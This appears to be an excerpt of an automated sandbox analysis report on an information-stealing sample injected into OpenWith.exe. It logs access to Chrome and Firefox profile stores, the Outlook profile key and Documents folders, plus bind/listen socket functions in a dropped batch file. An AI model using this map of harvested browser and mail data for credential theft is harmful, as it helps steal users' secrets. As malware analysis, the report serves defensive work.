Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\safebrowsing Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs\browser\newtab Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\doomed Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\thumbnails Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\settings\main\ms-language-packs\browser Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release\cache2\entries Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Directory queried: C:\Users\user\Documents\BQJUWOYRTO Jump to behavior
Source: Yara match File source: Process Memory Space: OpenWith.exe PID: 6960, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 11.3.OpenWith.exe.1bd88071e18.84.unpack, type: UNPACKEDPE
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E956B50 bind,WSAGetLastError,closesocket, 3_2_00007FF79E956B50
Source: C:\Users\Public\ajbs50ul.bat Code function: 3_2_00007FF79E956860 bind,listen,WSAGetLastError,closesocket, 3_2_00007FF79E956860
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe Code function: 14_2_00000203FE6CCDF4 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 14_2_00000203FE6CCDF4